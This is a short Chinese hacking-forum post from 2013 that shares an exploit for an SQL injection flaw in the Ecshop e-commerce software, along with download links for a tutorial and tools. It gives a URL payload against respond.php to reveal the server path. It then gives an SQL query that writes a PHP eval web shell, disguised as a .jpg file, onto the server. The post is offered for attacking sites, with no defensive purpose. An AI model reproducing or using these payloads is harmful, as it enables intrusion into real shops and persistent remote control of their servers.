Ecshop注入漏洞exp攻击
本帖最后由 秋叶下的烟头 于 2013-11-24 13:10 编辑Ecshop注入漏洞
发个有用的帖子,防止删号呀!!
教程:http://pan.baidu.com/s/1eQnDp
软件工具下载连接:http://pan.baidu.com/share/link?shareid=338932&uk=2785594607
关于后台拿shell我写的不清楚。
大家可以先爆路径/respond.php?code=cod&attach=voucher&sp_billno=1%20and%201=2
知道路径去后台sql查询select "<?php @eval($_POST['pass']);?>" into outfile 'D:/webyifu/123.php;1.jpg';
能看懂把!!! 你这个漏洞是很久以前的了,去年就有了。
页:
[1]